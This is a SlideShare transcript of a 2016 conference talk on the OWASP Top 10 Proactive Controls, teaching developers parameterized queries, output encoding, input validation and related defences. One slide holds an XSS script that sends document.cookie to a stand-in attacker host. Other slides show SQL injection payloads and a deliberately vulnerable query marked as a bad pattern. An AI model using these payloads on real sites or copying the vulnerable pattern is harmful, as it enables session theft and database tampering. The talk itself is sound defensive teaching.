SlideShare a Scribd company logo

OWASP Top 10 Proactive Controls

Download as PPTX, PDF
K
Katy Anton

Cyber attacks are a real and growing threat to businesses and an increasing number of attacks take place at application layer. The best defence against is to develop applications where security is incorporated as part of the software development lifecycle. The OWASP Top 10 Proactive Controls project is designed to integrate security in the software development lifecycle. In this special presentation for PHPNW, based on v2.0 released this year, you will learn how to incorporate security into your software projects. Recommended to all developers who want to learn the security techniques that can help them build more secure applications.

Technology
1 of 55
OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
New Website 5
OWASP Application Security Verification Standard (ASVS) 6
C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
C3. Encode Your Output 16
C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
C4. Validate All Input 19
C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
C5. Implement Identity and Authentication Control 27
C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls 34
C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
C7. Protect Data 38
C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
C8. Implement Logging and Intrusion Detection 43
44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries 45
C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
C10. Error and Exception Handling 49
C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
It’s a Start To Secure Software by Default! 53
Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54
Thank you 55

Recommended

Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A Primer
Brian Hysell
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
What is zero trust model (ztm)
What is zero trust model (ztm)What is zero trust model (ztm)
What is zero trust model (ztm)
Ahmed Banafa
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 

Recommended

Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A Primer
Brian Hysell
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
What is zero trust model (ztm)
What is zero trust model (ztm)What is zero trust model (ztm)
What is zero trust model (ztm)
Ahmed Banafa
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
Scott Sutherland
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0
Network Intelligence India
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Threat Intelligence
Threat IntelligenceThreat Intelligence
Threat Intelligence
Deepak Kumar (D3)
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
TzahiArabov
 
Threat Modeling Using STRIDE
Threat Modeling Using STRIDEThreat Modeling Using STRIDE
Threat Modeling Using STRIDE
Girindro Pringgo Digdo
 
Bug bounty
Bug bountyBug bounty
Bug bounty
n|u - The Open Security Community
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
Sqrrl
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
Terrance Medina
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Ramiro Cid
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
CNIT 123 Ch 10: Hacking Web Servers
CNIT 123 Ch 10: Hacking Web ServersCNIT 123 Ch 10: Hacking Web Servers
CNIT 123 Ch 10: Hacking Web Servers
Sam Bowne
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Cyber security training
Cyber security trainingCyber security training
Cyber security training
Wilmington University
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
Jorge Orchilles
 
Security and Compliance
Security and ComplianceSecurity and Compliance
Security and Compliance
Amazon Web Services
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
n|u - The Open Security Community
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 

More Related Content

What's hot

Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

What's hot (20)

ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
 
Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0Vapt pci dss methodology ppt v1.0
Vapt pci dss methodology ppt v1.0
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Threat Intelligence
Threat IntelligenceThreat Intelligence
Threat Intelligence
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Threat Modeling Using STRIDE
Threat Modeling Using STRIDEThreat Modeling Using STRIDE
Threat Modeling Using STRIDE
 
Bug bounty
Bug bountyBug bounty
Bug bounty
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Web application security
Web application securityWeb application security
Web application security
 
CNIT 123 Ch 10: Hacking Web Servers
CNIT 123 Ch 10: Hacking Web ServersCNIT 123 Ch 10: Hacking Web Servers
CNIT 123 Ch 10: Hacking Web Servers
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Cyber security training
Cyber security trainingCyber security training
Cyber security training
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
Security and Compliance
Security and ComplianceSecurity and Compliance
Security and Compliance
 
Threat Modelling
Threat ModellingThreat Modelling
Threat Modelling
 

Viewers also liked

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 

Viewers also liked (10)

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
OWASP Mobile Top 10
OWASP Mobile Top 10OWASP Mobile Top 10
OWASP Mobile Top 10
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015
 
OWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceOWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object Reference
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Secure Software Development Adoption Strategy
Secure Software Development Adoption StrategySecure Software Development Adoption Strategy
Secure Software Development Adoption Strategy
 
OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure!
 

Similar to OWASP Top 10 Proactive Controls

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 

Similar to OWASP Top 10 Proactive Controls (20)

Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwc
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy Anton
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
Attques web
Attques webAttques web
Attques web
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
SecDevOps for API Security
SecDevOps for API SecuritySecDevOps for API Security
SecDevOps for API Security
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
 
Web Application Penetration Test
Web Application Penetration TestWeb Application Penetration Test
Web Application Penetration Test
 
EMEA Airheads - Configuring different APIs in Aruba 8.x
EMEA Airheads - Configuring different APIs in Aruba 8.x EMEA Airheads - Configuring different APIs in Aruba 8.x
EMEA Airheads - Configuring different APIs in Aruba 8.x
 
Securing Microservices using Play and Akka HTTP
Securing Microservices using Play and Akka HTTPSecuring Microservices using Play and Akka HTTP
Securing Microservices using Play and Akka HTTP
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 

Recently uploaded

The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governanceAPI Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governance
WSO2
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Recently uploaded (20)

Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation Computing
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cf
 
Simplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptxSimplifying Mobile A11y Presentation.pptx
Simplifying Mobile A11y Presentation.pptx
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governanceAPI Governance and Monetization - The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Decarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational PerformanceDecarbonising Commercial Real Estate: The Role of Operational Performance
Decarbonising Commercial Real Estate: The Role of Operational Performance
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 

OWASP Top 10 Proactive Controls

  • 1. OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
  • 2. OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
  • 3. Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
  • 4. Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
  • 7. C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
  • 8. 8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
  • 9. SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
  • 10. C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
  • 11. PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
  • 12. C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
  • 13. C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
  • 14. 14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
  • 15. XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 16. C3. Encode Your Output 16
  • 17. C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
  • 18. 18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
  • 19. C4. Validate All Input 19
  • 20. C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
  • 21. C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
  • 22. Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
  • 23. Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
  • 24. 2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
  • 25. 25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
  • 26. New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
  • 27. C5. Implement Identity and Authentication Control 27
  • 28. C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
  • 29. C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
  • 30. C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
  • 31. C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
  • 32. Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
  • 33. 33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
